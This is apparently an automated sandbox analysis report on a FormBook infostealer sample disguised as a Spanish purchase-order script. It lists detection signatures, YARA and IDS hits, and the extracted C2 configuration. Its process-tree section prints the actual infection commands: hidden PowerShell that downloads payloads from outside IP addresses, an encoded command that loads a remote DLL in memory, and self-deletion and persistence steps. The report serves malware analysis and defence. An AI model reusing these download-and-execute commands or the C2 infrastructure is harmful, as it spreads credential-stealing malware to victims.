Edit tour
Windows
Analysis Report
NUEVA ORDEN DE COMPRA 80107.wsf
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- wscript.exe (PID: 6632 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\NUEVA ORDEN DE COMPRA 801 07.wsf" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden wget 'http ://2.56.57 .22/daveCr pted.jpg' -o C:\Wind ows\Temp\D one.vbs;ex plorer.exe C:\Window s\Temp\Don e.vbs;Star t-Sleep 1; rm *.vbs,* .wsf MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - explorer.exe (PID: 6740 cmdline:
"C:\Window s\explorer .exe" C:\W indows\Tem p\Done.vbs MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 6164 cmdline:
C:\Windows \explorer. exe /facto ry,{75dff2 b7-6936-4c 06-a8bb-67 6a7b00b24b } -Embeddi ng MD5: AD5296B280E8F522A8A897C96BAB0E1D) - wscript.exe (PID: 4544 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Wi ndows\Temp \Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 2328 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ iUqm = 'Ww BCAHkAdABl AFsAXQBdAC AAJABEAEwA TAAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAG?? ?ANgA0AFMA dAByAGkAbg BnACgAKABO AG???AdwAt AE8AYgBqAG ???AYwB0AC AATgBlAHQA LgBXAG???A YgBDAGwAaQ BlAG4AdAAp AC4ARABvAH cAbgBsAG8A YQBkAFMAdA ByAGkAbgBn ACgAJwBoAH QAdABwADoA LwAvADIAMA AuADEAMAA2 AC4AMgAzAD IALgA0AC8A ZABsAGwALw AyADYALQAw AD???ALQAy ADAAMgAyAC 0A???wB0AG EAcgB0AF?? ?AcAAuAHAA ZABmACcAKQ ApADsAWwBT AHkAcwB0AG ???AbQAuAE EAcABwAEQA bwBtAGEAaQ BuAF0AOgA6 AEMAdQByAH IAZQBuAHQA RABvAG0AYQ BpAG4ALgBM AG8AYQBkAC gAJABEAEwA TAApAC4ARw BlAHQAVAB5 AHAAZQAoAC cAZABkAHMA YwBmAEkAdg BxAGcAVwAu AEgAbwBOAF kAbABEAFIA TwBMAFAAJw ApAC4ARwBl AHQATQBlAH QAaABvAGQA KAAnAFIAdQ BuACcAKQAu AEkAbgB2AG 8AawBlACgA JABuAH???A bABsACwAIA BbAG8AYgBq AG???AYwB0 AFsAXQBdAC AAKAAnAHQA eAB0AC4Aaw BqAGkAaAB1 AGcAZgBkAH MAdAAvADIA MgAuADcANQ AuADYANQAu ADIALwAvAD oAcAB0AHQA aAAnACkAKQ A=';$OWjux D = [Syste m.Text.Enc oding]::Un icode.GetS tring( [Sy stem.Conve rt]::FromB ase64Strin g( $iUqm.r eplace('?? ?','U') ) );powershe ll.exe -wi ndowstyle hidden -Ex ecutionPol icy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5980 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6996 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - windowstyl e hidden - ExecutionP olicy Byps s -NoProfi le -Comman d "[Byte[] ] $DLL = [ System.Con vert]::Fro mBase64Str ing((New-O bject Net. WebClient) .DownloadS tring('htt p://20.106 .232.4/dll /26-05-202 2-StartUp. pdf'));[Sy stem.AppDo main]::Cur rentDomain .Load($DLL ).GetType( 'ddscfIvqg W.HoNYlDRO LP').GetMe thod('Run' ).Invoke($ null, [obj ect[]] ('t xt.kjihugf dst/22.75. 65.2//:ptt h')) MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 5076 cmdline:
"C:\Window s\System32 \WindowsPo wershell\v 1.0\powers hell.exe" -WindowSty le Hidden Copy-Item -Path *.vb s -Destina tion C:\Pr ogramData\ Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 3276 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - RegAsm.exe (PID: 7076 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F) - explorer.exe (PID: 3688 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - powershell.exe (PID: 1320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -W indowStyle Hidden St art-Sleep 5;Start-Pr ocess C:\P rogramData \Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4152 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden Start-Slee p 5 MD5: 95000560239032BC68B4C2FDFCDEF913) - wscript.exe (PID: 7024 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - WWAHost.exe (PID: 5680 cmdline:
C:\Windows \SysWOW64\ WWAHost.ex e MD5: 370C260333EB3149EF4E49C8F64652A0) - cmd.exe (PID: 508 cmdline:
/c del "C: \Windows\M icrosoft.N ET\Framewo rk\v4.0.30 319\RegAsm .exe" MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - explorer.exe (PID: 3504 cmdline:
"C:\Window s\explorer .exe" /LOA DSAVEDWIND OWS MD5: AD5296B280E8F522A8A897C96BAB0E1D) - explorer.exe (PID: 4100 cmdline:
explorer.e xe MD5: AD5296B280E8F522A8A897C96BAB0E1D) - explorer.exe (PID: 3616 cmdline:
"C:\Window s\explorer .exe" /LOA DSAVEDWIND OWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
{"C2 list": ["www.hibikaiteki.com/s4ig/"], "decoy": ["60carrst-th15.com", "suapeleemprimeirolugar.com", "fairble.com", "7890136.com", "toastingthetunnos.com", "znetonline.net", "ginamora.com", "salazarcomunicacion.com", "acesso-livre-mercado.com", "nancykmorrison.store", "amazonwisely.com", "dannymarkphotography.com", "tenlog029.xyz", "quickfinderplus.online", "abdomenpkluwk.xyz", "portraypsdbmv.top", "arst4you.com", "doublehartpress.com", "deadsdradqueer.com", "salvaescalerasarnet.com", "givingisnotagiven.com", "vellegallery.com", "rtva.top", "nexusbalance.com", "createurs-de-bijoux.com", "kellybavis.com", "giaohanggiaretetkiemhcm.com", "cukis-prakerja.xyz", "dbk3.com", "40dgj.xyz", "bikebrewandflights.com", "lovinlufkin.com", "redentor.digital", "rqgmarket.com", "kindofgoodsco.com", "tb25431.icu", "caui.top", "mercedesfbs4.com", "yadook.com", "rab-pas-vervallen.icu", "shref94.com", "chinafireratedglass.com", "driftwoodbeachclub.com", "mentication.com", "schedulekeymail.com", "cameraderie.photography", "promoapp12.com", "modart.xyz", "choicearticleto-readtoday.info", "prostitutkitambovasuck.info", "mgav21.xyz", "idreamtz.com", "keepcharged.online", "gobigmedia.net", "cookinkele.com", "99lottery.info", "atlantidepc.com", "univerdelacreation.com", "thuongmainongnghiep.com", "thulasiabc.com", "sushifactoryamphawa.com", "emprendedor-virtual.com", "3laaaldin.com", "madisonboles.com"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| |
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Click to see the 46 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| |
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Click to see the 23 entries |
⊘No Sigma rule has matched
Timestamp: | 20.106.232.4192.168.2.680497692025011 05/27/22-21:15:48.653624 |
SID: | 2025011 |
Source Port: | 80 |
Destination Port: | 49769 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Networking |
---|
Source: | Network Connect: | ||
Source: | Domain query: | ||
Source: | Network Connect: | ||
Source: | Network Connect: | ||
Source: | Domain query: | ||
Source: | Domain query: | ||
Source: | Domain query: | ||
Source: | Network Connect: |
Source: | Snort IDS: |
Source: | Bad PDF prefix: |